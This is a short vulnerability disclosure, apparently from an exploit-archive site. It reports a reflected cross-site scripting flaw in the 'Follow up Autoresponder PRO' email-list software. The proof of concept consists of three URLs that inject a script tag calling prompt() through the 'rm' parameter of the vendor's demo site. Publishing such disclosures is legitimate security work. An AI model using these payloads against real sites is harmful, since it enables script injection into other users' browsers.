Autoresponder PRO Cross Site Scripting

2014.01.21
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[+] Author: TUNISIAN CYBER [+] Exploit Title: Follow up Autoresponder PRO Cross Site Scripting vulnerability [+] Date: 09-01-2014 [+] Category: WebApp [+] Google Dork: : [+] Tested on: KaliLinux [+] Vendor: http://www.scripts4webmasters.com/ [+] Friendly Sites: na3il.com,th3-creative.com ############################################################### +Description: Web based php/mysql email list management software where you can get subscriber names, email addresses to do contact management email marketing. +Exploit: Follow up Autoresponder PRO suffers from a Cross Site Scripting vulnerability +PoC:(Tested on Demo) http://www.scripts4webmasters.com/arppro-demo/?rm=send_login_info'%22()%26%25<ScRiPt%20>prompt(986987)</ScRiPt> http://www.scripts4webmasters.com/arppro-demo/?rm=license'%22()%26%25<ScRiPt%20>prompt(941203)</ScRiPt> http://www.scripts4webmasters.com/arppro-demo/?rm=send_login_info'%22()%26%25<ScRiPt%20>prompt(918540)</ScRiPt> ######################################################################################## Greets to: XMaX-tn, N43il HacK3r, XtechSEt Sec4Ever Members: DamaneDz UzunDz GEOIX ########################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top